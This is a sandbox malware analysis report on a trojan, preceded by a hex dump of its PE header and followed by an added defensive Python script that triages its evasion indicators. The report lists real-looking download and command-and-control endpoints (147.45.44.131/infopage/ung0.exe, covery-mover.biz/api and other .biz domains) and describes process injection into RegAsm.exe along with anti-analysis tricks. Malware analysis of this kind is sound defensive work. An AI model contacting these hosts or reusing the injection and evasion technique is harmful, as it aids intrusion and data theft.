00 00 00 00 00 00 00 00 2c 0d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 da 03 00 00 10 00 00 00 dc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 f0 03 00 00 22 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c f6 00 00 00 20 04 00 00 50 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 20 05 00 00 02 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 39 00 00 00 30 05 00 00 3a 00 00 00 54 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1
          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
          Host: 147.45.44.131
          Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 147.45.44.131
        Source: Joe Sandbox View | ASN Name: FREE-NET-ASFREEnetEU
        Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49704 -> 147.45.44.131:80
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: covery-mover.biz
        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: global traffic | HTTP traffic detected: GET /infopage/ung0.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131 | Connection: Keep-Alive
        Source: global traffic | DNS traffic detected: DNS query: zinc-sneark.biz
        Source: global traffic | DNS traffic detected: DNS query: se-blurry.biz
        Source: global traffic | DNS traffic detected: DNS query: dwell-exclaim.biz
        Source: global traffic | DNS traffic detected: DNS query: formy-spill.biz
        Source: global traffic | DNS traffic detected: DNS query: covery-mover.biz
        Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: covery-mover.biz
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/ung0.exe
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/ung0.exeP
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/2
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2179542666.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/api
        Source: RegAsm.exe, 00000005.00000002.2179542666.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2179542666.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/apiQ
        Source: RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://covery-mover.biz/apin
        Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00431A30 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00431BB0 GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt

        System Summary

        Source: htZgRRla8S.exe, Sap.cs | Long String: Length: 18812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00414A30 appears 76 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00408000 appears 52 times
        Source: htZgRRla8S.exe, 00000000.00000002.2139187988.000000000142E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, 00000000.00000000.2107648792.0000000000CFE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUpdateManager.exeL vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, 00000000.00000002.2140400522.0000000005570000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameqiobmurj.dll4 vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, 00000000.00000002.2139643170.00000000030D4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameqiobmurj.dll4 vs htZgRRla8S.exe
        Source: htZgRRla8S.exe | Binary or memory string: OriginalFilenameUpdateManager.exeL vs htZgRRla8S.exe
        Source: htZgRRla8S.exe, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
        Source: htZgRRla8S.exe, Sap.cs | Base64 encoded string:
        Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@8/7@5/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00436F90 CoCreateInstance, SysAllocString, CoSetProxyBlanket, SysAllocString, SysAllocString, VariantInit, VariantClear, SysFreeString, SysFreeString, SysFreeString, SysFreeString, GetVolumeInformationW
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\htZgRRla8S.exe.log
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | File created: C:\Users\user\AppData\Local\Temp\qiobmurj
        Source: htZgRRla8S.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: htZgRRla8S.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: htZgRRla8S.exe | ReversingLabs: Detection: 55%
        Source: unknown | Process created: C:\Users\user\Desktop\htZgRRla8S.exe "C:\Users\user\Desktop\htZgRRla8S.exe"
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: rasapi32.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: rasman.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: rtutils.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: amsi.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\htZgRRla8S.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\htZgRRla8S.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: htZgRRla8S.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: htZgRRla8S.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: htZgRRla8S.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.pdb source: htZgRRla8S.exe, 00000000.00000002.2139643170.00000000030D4000.00000004.00000800.00020000.00000000.sdmp
Source: htZgRRla8S.exe Static PE information: 0xC45C35F2 [Thu May 24 08:50:58 2074 UTC] (a compile timestamp about 50 years after the 2024-12-12 analysis date, which is what triggers the "suspicious time stamp" signature)
Source: C:\Users\user\Desktop\htZgRRla8S.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00446061 push edx; retf 5_2_00446062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh 5_2_0043CA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00445A2E push esi; ret 5_2_00445A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00442543 push esp; retf 5_2_00442549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00446EA4 push edi; iretd 5_2_00446EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00439F70 push eax; mov dword ptr [esp], 60616263h 5_2_00439F7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll
Source: C:\Users\user\Desktop\htZgRRla8S.exe Process information set: NOOPENFILEERRORBOX (reported 39 times)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (reported 5 times)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: htZgRRla8S.exe PID: 4144, type: MEMORYSTR
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory allocated: 1800000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory allocated: 3030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory allocated: 5030000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\htZgRRla8S.exe Thread delayed: delay time: 922337203685477 (this value is .NET TimeSpan.MaxValue expressed in milliseconds, Int64.MaxValue 100-ns ticks divided by 10000, i.e. an unbounded sleep)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll
Source: C:\Users\user\Desktop\htZgRRla8S.exe TID: 3576 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\htZgRRla8S.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312 Thread sleep time: -30000s >= -30000s (reported twice)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: RegAsm.exe, 00000005.00000002.2179497221.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: RegAsm.exe, 00000005.00000002.2179542666.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: htZgRRla8S.exe, 00000000.00000002.2139187988.000000000149B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0043B480 LdrInitializeThunk, 5_2_0043B480
Source: C:\Users\user\Desktop\htZgRRla8S.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory allocated: page read and write | page guard
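The evasion indicators in this section (a PE timestamp in the future, an unbounded Thread.Sleep, a Win32_BIOS WMI query and hypervisor-related strings in memory) can be triaged mechanically when many such reports have to be read. The following Python is an added example written for this page, not Joe Sandbox code: it re-types five signature lines from this report as constructed input (the real report fuses the source path and the observation without a space) and parses them. Two facts it relies on: the PE TimeDateStamp is seconds since the Unix epoch, and 922337203685477 is .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks of 100 ns divided by 10000). The WMI class list, the hypervisor markers and the weights are the example's own assumptions. The "Hyper-V RAW" strings are the display name of the Hyper-V sockets Winsock provider (the adjacent mswsock.dll path in the third memory string points the same way), which exists on ordinary Windows 10 hosts, so the example scores them as weak.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed input: signature lines from this report, re-typed with a space
# between the source and the observation.
REPORT_LINES = [
    "Source: htZgRRla8S.exe Static PE information: 0xC45C35F2 [Thu May 24 08:50:58 2074 UTC]",
    "Source: C:\\Users\\user\\Desktop\\htZgRRla8S.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe TID: 5312 Thread sleep time: -30000s >= -30000s",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT * FROM Win32_BIOS",
    "Source: RegAsm.exe, 00000005.00000002.2179497221.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx",
]

# Analysis start from the report's general information (2024-12-12 21:31:06 +01:00).
ANALYSIS_START_UTC = datetime(2024, 12, 12, 20, 31, 6, tzinfo=timezone.utc)

# .NET TimeSpan.MaxValue is Int64.MaxValue 100-ns ticks; in milliseconds that is
# exactly the 922337203685477 the sandbox reports for the sleep above.
DOTNET_TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 180_000  # the report's own ">= 3 min" threshold

# Assumed lists (tune per environment): WMI classes commonly read to fingerprint
# a VM, and substrings that name a hypervisor.
VM_FINGERPRINT_CLASSES = {"WIN32_BIOS", "WIN32_COMPUTERSYSTEM", "WIN32_DISKDRIVE",
                          "WIN32_VIDEOCONTROLLER", "WIN32_PNPENTITY"}
HYPERVISOR_MARKERS = ("HYPER-V", "VMWARE", "VBOX", "VIRTUALBOX", "QEMU", "XEN")

_PE_TS = re.compile(r"Static PE information: 0x([0-9A-Fa-f]{8})")
_SLEEP = re.compile(r"Thread sleep time: -(\d+)s")
_WMI = re.compile(r"SELECT \* FROM (\w+)", re.IGNORECASE)
_MEMSTR = re.compile(r"Binary or memory string: (.+)$")


def decode_pe_timestamp(raw: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=raw)


def classify_sleep(value_ms: int) -> str:
    """Joe Sandbox prints the argument with an 's' suffix, but it is milliseconds."""
    if value_ms == DOTNET_TIMESPAN_MAX_MS:
        return "timespan_max"      # Thread.Sleep(TimeSpan.MaxValue): never wakes
    if value_ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def triage(lines):
    """Return (category, detail, weight) findings for sandbox-evasion indicators."""
    findings = []
    for line in lines:
        if m := _PE_TS.search(line):
            ts = decode_pe_timestamp(int(m.group(1), 16))
            if ts > ANALYSIS_START_UTC:   # compiled "after" it was analysed: timestomped
                findings.append(("future_timestamp", ts.strftime("%Y-%m-%d %H:%M:%S UTC"), "medium"))
        elif m := _SLEEP.search(line):
            kind = classify_sleep(int(m.group(1)))
            if kind != "short":
                findings.append(("sleep_" + kind, m.group(1) + " ms", "strong"))
        elif m := _WMI.search(line):
            cls = m.group(1).upper()
            if cls in VM_FINGERPRINT_CLASSES:
                findings.append(("wmi_vm_fingerprint", cls, "medium"))
        elif m := _MEMSTR.search(line):
            s = m.group(1).strip()
            if any(h in s.upper() for h in HYPERVISOR_MARKERS):
                # Weak on purpose: "Hyper-V RAW" is a Winsock provider name on any Win10 host.
                findings.append(("hypervisor_string", s, "weak"))
    return findings


if __name__ == "__main__":
    for category, detail, weight in triage(REPORT_LINES):
        print(f"{weight:6s} {category:20s} {detail}")
```

The sleep check keys on the exact TimeSpan.MaxValue value rather than on "very large" because the sandbox's API interceptor rewrote the Sleep calls (see the API Interceptor entries later in the report); an exact match tells you the sample asked for an infinite sleep, not merely a long one.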

        HIPS / PFW / Operating System Protection Evasion

Source: 0.2.htZgRRla8S.exe.5570000.1.raw.unpack, Engineers.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T)) (reported twice)
Source: 0.2.htZgRRla8S.exe.5570000.1.raw.unpack, Engineers.cs Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64) (12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = 0x40 = PAGE_EXECUTE_READWRITE)
Source: C:\Users\user\Desktop\htZgRRla8S.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\htZgRRla8S.exe File written: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.cs
